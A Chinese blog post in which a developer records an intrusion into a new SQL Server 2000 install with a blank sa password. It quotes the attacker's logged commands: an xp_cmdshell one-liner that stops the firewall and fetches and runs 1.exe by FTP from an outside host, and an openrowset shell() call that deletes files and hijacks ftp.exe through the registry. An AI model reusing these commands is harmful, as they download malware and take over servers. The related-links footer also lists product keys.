本来正在使用Eclipse的断点调试结合事件探查器观察一些SQL语句的执行,
突然发现很奇怪的现象,在没有执行任何语句的时候,事件探查器不断打印出SQLServer服务器的执行记录。
粗看一下,发现这样的语句:
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cmd /c attrib -s -h wbem\we.exe&del wbem\we.exe&del X.EXE® delete HKEY_CLASSES_ROOT\WScript.Shell /f® delete HKEY_CLASSES_ROOT\WScript.Shell.1 /f® delete HKEY_CLASSES_ROOT\Wifayy /f® add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\currentversion\image file execution options\ftp.exe /v Debugger /t REG_SZ /d ctfmon.exe /f")')
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[wsp_pwssword]'))drop procedure wsp_pwssword
而且还正在不停的执行,由于是今天刚重新装好的电脑以及SQL2000,没有设置sa密码。没有安装杀毒软件,
赶快把服务器停掉、把网络断掉。
首先检查一下,任务管理器多出来的进程:
在C盘上搜索了一下最新的文件,大概多出了:
c:\cmd.exe
c:\windows\system32\cmd 没有扩展名,打开是一个文本文件,内容是:
open 2yxy.8800.org
123
123
binary
get 1.exe C:\cmd.exe
bye
c:\windows\system32\1.exe 图标是JPG文件的图标,属性写的是QQ2010,毫无疑问是病毒伪装的
c:\windows\system32\c.exe
还有好几个文件。太可恨了!!
使用AutoRuns查了一下,多出来的自动启动的服务:
现在把事件探查器的记录结果记在下面,有时间再分析吧:
exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT'
exec xp_cmdshell 'cmd.exe /c net stop sharedaccess&@echo open 2yxy.8800.org> cmd&@echo 123>> cmd&@echo 123>> cmd&@echo binary >> cmd&@echo get 1.exe C:\cmd.exe>> cmd&@echo bye >> cmd&ftp -s:cmd &C:\cmd.exe&del cmd /q /f&ping -n 3 127.0.0.1>nul&del C:\cmd.exe /f'
SELECT N'Testing Connection...'
EXECUTE msdb.dbo.sp_sqlagent_get_perf_counters
-- sp_sqlagent_get_perf_counters
CREATE TABLE #temp
(
performance_condition NVARCHAR(1024) COLLATE database_default NOT NULL
)
-- sp_sqlagent_get_perf_counters
INSERT INTO #temp VALUES (N'dummy')
太多了,不再记录了,跟踪记录保存下来了。
对了对方的ApplicationName是ISQL-32
真是火大了,TNND!!!
- 大小: 54.7 KB
- 大小: 48.9 KB
分享到:
相关推荐
搭建Snort SQL SERVER acid入侵检测环境.pdf
最新microsoft sql server sa权限入侵方法
[Microsoft Press] Microsoft SQL Server 2012 技术内幕 (英文版) [Microsoft Press] Microsoft SQL Server 2012 Internals (E-Book) ☆ 图书概要:☆ Dive deep inside the architecture of SQL Server 2012 ...
Microsoft SQL Server 2008 Native Client (SQL Server Native Client) 是单一动态链接库 (DLL),其中包含 SQL OLE DB 提供者和 SQL ODBC 驱动程序。此链接库针对使用机器码 API (ODBC、OLE DB 和 ADO) 的应用程序...
SQLServer+ 免安装版 SQLServer+是在原有SQLServer2000的基础上改善了数据库安装的繁锁性,让软件企业在发布基于SQLServer2000数据库软件的时候,只要把软件打包进入安装包而不需要再单独安装数据库,也不需要另外...
压缩包内附带链接服务器创建脚本方式,此SQL Server Native Client 10.0无病毒,有64位和32位可供选择。...安装完SQL Server Native Client 10.0后再创建个链接服务器,可以实现高版本SQLserver远程链接SQLserver2000。
sqlserver驱动jar java sqlserver驱动jar,java sqlserver驱动jar,java sqlserver驱动jar
SQL Server 2014基础入门视频教程 (40集,含课件) 1.SQL Server 2014简介.mp4 2.SQL Server 2014硬件和软件要求.mp4 3.SQL Server 2014数据库安装.mp4 4.SQL Server 2014数据库创建.mp4 5.SQL Server 2014...
SqlServer连接工具SqlServer连接工具SqlServer连接工具
SQLServer文件, 否则后果自负。作者不为您承担任何方面的任何责任。 SQL Server 2000绿色版注意事项 --------------------------- 1 本地连接服务器请使用界面中“服务器名”文本框中的文本作为服务器名连接...
Microsoft SQL Server Management Studio Express(SSMSE)是一种免费、易于使用的图形管理工具,用于管理SQL Server 2005 Express Edition和SQL Server 2005 ExpressEdition with Advanced Services。注意:SSMSE ...
支持navicate 连接 sqlserver 2019 的 驱动sqlserver native client 11.0 ,亲测可用,ssms自带的不能连接,会报远程关闭错误。
sqlserver离线安装包
SQL Server 2016 Web BXJTY-X3GNH-WHTHG-8V3XK SQL Server 2016 Standard B9GQY-GBG4J-282NY-QRG4X SQL Server 2016 Enterprise Core TBR8B-BXC4Y-298NV-PYTBY SQL Server 2016 Enterprise MDCJV-3YX8N-WG89M-KV443...
Microsoft sql server 2008 Native Client (SQL Server Native Client) 是一个同时包含 SQL OLE DB 访问接口和 SQL ODBC 驱动程序的动态链接库 (DLL)。它对使用本机代码 API(ODBC、OLE DB 和 ADO)连接 Microsoft ...
1.SQL Server 2014简介.mp4 10.SQL Server 2014定义表主键、外键.mp4 11.SQL Server 2014新增表记录.mp4 12.SQL Server 2014查询表记录.mp4 13.SQL Server 2014修改表记录.mp4 14.SQL Server 2014删除表记录....
sql server 2008 安装教程sql server 2008 安装教程sql server 2008 安装教程sql server 2008 安装教程sql server 2008 安装教程
SQL Server 2005 移动版(SQL Server Mobile)或SQL Server 2000 Windows CE 2.0版(SQL Server CE 2.0)的企业和个人用户如果计划与SQL Server 2000或SQL Server 2005数据库保持同步,需要在您运行Microsoft ...
sqlserver自动生成sql语句工具sqlserver转oracle
适用于Microsoft SQL Server 2014、SQL Server 2012、SQL Server 2008 R2、SQL Server 2008、SQL Server 2005 和 SQL Azure。对于适用于 SQL Server 的 Microsoft JDBC Driver 4.1,将从 SQL Server 2008 开始支持。...